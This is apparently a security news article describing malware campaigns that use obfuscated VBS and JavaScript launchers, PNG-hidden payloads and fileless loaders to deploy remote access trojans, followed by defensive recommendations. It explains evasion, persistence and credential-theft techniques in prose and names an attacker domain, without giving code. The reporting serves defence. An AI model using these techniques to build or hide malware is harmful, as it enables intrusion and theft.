π―A new type of malware is using tricky methods to sneak into computers, like hiding in harmless-looking files. It's important for companies to be extra careful and watch out for suspicious activities to keep their systems safe.
What Happened
A sophisticated malware campaign has emerged, utilizing obfuscated Visual Basic Script (VBS) files and PNG-embedded loaders to deploy Remote Access Trojans (RATs). This multi-stage attack was first detected in early 2026 during routine endpoint monitoring. What initially appeared to be a simple alert quickly unfolded into a well-organized operation, revealing a delivery framework capable of pushing various malware payloads from a single infrastructure.
The campaign began with a suspicious VBS file named Name_File.vbs, found in the \Users\Public\Downloads\ directory of a compromised system. SentinelOne's endpoint protection caught and quarantined the file, but the encoded content warranted further investigation. Analysts from LevelBlue discovered that this alert was just the tip of the iceberg, leading to the identification of multiple obfuscated VBS files linked to different malware payloads, including XWorm variants and Remcos RAT.
In a related development, researchers have identified a new RAT called DesckVB, which employs heavily obfuscated JavaScript and a fileless .NET loader to evade detection. This malware starts its infection chain with a JavaScript file that drops a PowerShell script into the C:\Users\Public directory, mimicking the tactics seen in the VBS campaign. The use of Base64 encoding and string reversal to conceal command-and-control (C2) server addresses highlights a growing trend in malware development that prioritizes stealth and evasion.
Additionally, the Formbook malware campaign has been noted for its persistent use of multiple obfuscation techniques to deliver data-stealing malware. Formbook, which has been around since 2016, utilizes phishing emails to deliver its payloads, employing tactics such as DLL sideloading and obfuscated JavaScript to bypass detection mechanisms. This malware targets sensitive information, including login credentials and browser data, and has been observed in multiple campaigns across Europe and South America.
New insights have emerged regarding another RAT known as PureRAT, which cleverly hides malicious code inside ordinary-looking PNG image files. The attack begins with a malicious .lnk file that, when opened, triggers a concealed PowerShell command. This command retrieves a PNG file containing a Base64-encoded portable executable (PE) file, which is executed entirely in memory, leaving almost no traces on disk. This technique exemplifies the shift towards fileless execution, making detection by traditional security tools increasingly difficult. Furthermore, PureRAT establishes a Task Scheduler job for persistence and conducts checks for virtual environments before executing its payload, which can perform host fingerprinting, keylogging, and credential theft.
Who's Being Targeted
This malware campaign targets organizations that may not have stringent security measures in place. The attackers leveraged an infrastructure hosted on an attacker-controlled domain, news4me[.]xyz, which featured openly accessible directories. These directories served various roles, including staging VBS launchers and hosting obfuscated payload files. The campaign's design allows for rapid updates and expansions of hosted payloads, making it a flexible and scalable threat. The DesckVB RAT similarly targets vulnerable systems, employing techniques that allow it to operate without leaving traditional file traces, making it a serious concern for both individuals and organizations. The combination of VBS and JavaScript-based attacks suggests that attackers are diversifying their methods to maximize their chances of success. Formbook's dual approach of using DLL sideloading and obfuscated JavaScript further exemplifies this trend of malware evolution. PureRAT also employs advanced evasion tactics, including checking for virtual environments to avoid detection during analysis.
Signs of Infection
The infection mechanism begins with the VBS file, which acts as a launcher without containing active malicious code. Instead, it executes a Base64-encoded PowerShell command that fetches a PNG file from a remote server. This PNG file, seemingly innocuous, contains hidden malware that loads directly into memory, allowing the attackers to maintain a low profile.
Once executed, the malware downloads additional payloads, including an instance of Remcos RAT and a DLL designed to bypass User Account Control (UAC). This approach enables attackers to gain persistent access to compromised machines while leaving minimal traces on disk, complicating detection efforts for security teams. Similarly, DesckVB RAT uses layered obfuscation to hide its true purpose, employing techniques like in-memory execution to avoid detection by conventional antivirus tools. Formbook also employs similar evasion tactics, with its payloads hidden within obfuscated code in JavaScript and PDF files, making detection increasingly challenging. PureRAT's method combines image steganography with in-memory payload delivery, ensuring that its operations remain concealed.
How to Protect Yourself
Organizations should take immediate action to mitigate the risks posed by this malware campaign. Restricting the execution of VBS and BAT files from user-writable directories is crucial. Additionally, enforcing constrained PowerShell policies and enabling in-memory execution logging can help detect such threats early.
At the network level, blocking WebDAV connections and filtering out .xyz domains can limit access to the attacker's infrastructure. It's essential for organizations to not only rely on endpoint protection but also engage in deeper threat intelligence investigations to uncover broader attack vectors. Stopping one alert is not enough when the underlying infrastructure remains active and ready to deploy new attacks. Furthermore, keeping endpoint protection software current is critical, as detection tools have shown the ability to flag key components of both the VBS and DesckVB malware campaigns. Monitoring for suspicious LNK-initiated PowerShell activity, atypical cmstp.exe use, and recurring Task Scheduler creation are also recommended to enhance defenses against PureRAT. Monitoring for suspicious archive-based email attachments and anomalous DLL loading behavior, as advised for Formbook, can also bolster defenses against these evolving threats. Organizations should also harden endpoint security against fileless attacks by monitoring and restricting the use of built-in Windows binaries that are commonly abused in these campaigns.
The evolving tactics employed in this malware campaign underscore the need for organizations to adopt a multi-layered security approach, focusing not only on endpoint protection but also on network-level defenses and continuous monitoring of suspicious activities.
